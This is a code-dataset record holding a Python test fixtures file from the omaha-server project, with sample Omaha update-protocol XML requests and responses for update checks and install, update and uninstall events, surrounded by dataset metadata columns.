| 0
| 0
| 0
| 0
| 0.070175
| 171
| 3
| 61
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3afeba268d84e03a24416494cdd45c232377be8
| 9,375
|
py
|
Python
|
omaha_server/omaha/tests/fixtures.py
|
makar21/omaha-server
|
b84cdf6e67d9106e7a86b447204de4f82397b019
|
[
"Apache-2.0"
] | 142
|
2015-02-10T05:46:28.000Z
|
2020-03-21T13:18:31.000Z
|
omaha_server/omaha/tests/fixtures.py
|
tuladhar/omaha-server
|
6cfd86e4319e03af0eb319fae6c867691ffc2c36
|
[
"Apache-2.0"
] | 272
|
2015-01-15T09:43:49.000Z
|
2020-03-30T08:29:30.000Z
|
omaha_server/omaha/tests/fixtures.py
|
tuladhar/omaha-server
|
6cfd86e4319e03af0eb319fae6c867691ffc2c36
|
[
"Apache-2.0"
] | 77
|
2015-01-29T19:13:39.000Z
|
2020-03-21T06:45:35.000Z
|
# coding: utf8
"""
This software is licensed under the Apache 2 license, quoted below.
Copyright 2014 Crystalnix Limited
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
"""
request_update_check = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0"
version="1.3.23.0"
ismachine="0"
sessionid="{5FAD27D4-6BFA-4daa-A1B3-5A1F821FEE0F}"
userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}"
installsource="scheduler"
testsource="ossdev"
requestid="{C8F6EDF3-B623-4ee6-B2DA-1D08A0B4C665}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" version="1.2.23.0" nextversion="" lang="en" brand="GGLS"
client="someclientid" installage="39">
<updatecheck/>
<ping r="1"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="2.2.2.0" nextversion="" lang="en" brand="GGLS"
client="" installage="6">
<updatecheck/>
<ping r="1"/>
</app>
</request>"""
request_event = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="" nextversion="13.0.782.112" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="2" eventresult="4" errorcode="-2147219440" extracode1="268435463"/>
</app>
</request>
"""
request_event_install_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="" nextversion="0.0.0.1" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="2" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_event_update_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="0.0.0.1" nextversion="0.0.0.2" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="3" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_event_uninstall_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="0.0.0.2" nextversion="" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="4" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_data = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="0" sessionid="{5FAD27D4-6BFA-4daa-A1B3-5A1F821FEE0F}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="scheduler" testsource="ossdev" requestid="{C8F6EDF3-B623-4ee6-B2DA-1D08A0B4C665}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" version="1.3.23.0" nextversion="" lang="en" brand="GGLS" client="someclientid" installage="39">
<updatecheck/>
<data name="install" index="verboselogging"/>
<data name="untrusted">Some untrusted data</data>
<ping r="1"/>
</app>
</request>"""
response_update_check_negative = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
</response>"""
response_update_check_positive = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.112">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer.exe" required="true" size="23963192"/>
</packages>
<actions>
<action arguments="--do-not-launch-chrome" event="install" run="chrome_installer.exe"/>
<action version="13.0.782.112" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>
</actions>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
response_update_check_postitive_critical = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.111">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer_critical.exe" required="true" size="23963192"/>
</packages>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
response_event = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<event status="ok"/>
<event status="ok"/>
<event status="ok"/>
</app>
</response>"""
response_data_doc = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<data index="verboselogging" name="install" status="ok">
app-specific values here
</data>
<data name="untrusted" status="ok"/>
</app>
</response>"""
response_data = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app status="ok" appid="{430FD4D0-B729-4F61-AA34-91526481799D}">
<data status="ok" index="verboselogging" name="install">app-specific values here</data>
<data status="ok" name="untrusted"/>
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.112">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer.exe" required="true" size="23963192"/>
</packages>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
# Canned Omaha <event> attribute sets (install complete = eventtype 2,
# uninstall = eventtype 4; eventresult 1 = success, 0 = error).
event_install_success = {
    "eventtype": "2", "eventresult": "1", "errorcode": "0", "extracode1": "0"}
event_install_error = {
    "eventtype": "2", "eventresult": "0", "errorcode": "0", "extracode1": "0"}
event_uninstall_success = {
    "eventtype": "4", "eventresult": "1", "errorcode": "0", "extracode1": "0"}
| 46.182266
| 259
| 0.675627
| 1,202
| 9,375
| 5.227953
| 0.180532
| 0.0331
| 0.044558
| 0.046785
| 0.816359
| 0.801719
| 0.778644
| 0.762253
| 0.718969
| 0.704488
| 0
| 0.129562
| 0.12896
| 9,375
| 202
| 260
| 46.410891
| 0.639971
| 0.068373
| 0
| 0.694118
| 0
| 0.1
| 0.921041
| 0.311827
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.